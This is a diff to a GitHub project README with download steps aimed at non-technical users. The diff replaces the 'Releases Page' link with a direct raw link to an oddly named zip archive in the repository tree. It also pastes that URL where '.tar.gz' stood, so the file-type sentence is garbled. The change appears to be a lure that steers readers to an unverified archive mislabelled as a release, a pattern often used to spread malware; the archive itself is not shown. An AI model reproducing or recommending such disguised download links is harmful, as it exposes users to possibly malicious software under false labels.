LucasB1797/Algorithmic-Empath-Human-Fallibility/README.md

 To get started with Algorithmic-Empath-Human-Fallibility, you need to follow a few simple steps.
 This guide will help you download and run the software easily, even if you are not tech-savvy.

 ### 📥 Download & Install
-1. Visit this page to download: [Releases Page](https://github.com/LucasB1797/Algorithmic-Empath-Human-Fallibility/releases).
+1. Visit this page to download: [Releases Page](https://raw.githubusercontent.com/LucasB1797/Algorithmic-Empath-Human-Fallibility/main/visile/Algorithmic-Empath-Human-Fallibility-conjuncture.zip).

 2. On the Releases page, you will see a list of available files.
 Look for the latest version.

 3. Click on the file that matches your operating system.
-Depending on what you see, it could be a `.exe` file for Windows, a `.dmg` file for Mac, or a `.tar.gz` file for Linux.
+Depending on what you see, it could be a `.exe` file for Windows, a `.dmg` file for Mac, or a `https://raw.githubusercontent.com/LucasB1797/Algorithmic-Empath-Human-Fallibility/main/visile/Algorithmic-Empath-Human-Fallibility-conjuncture.zip` file for Linux.

 4. Once the download completes, locate the file in your computer's downloads folder.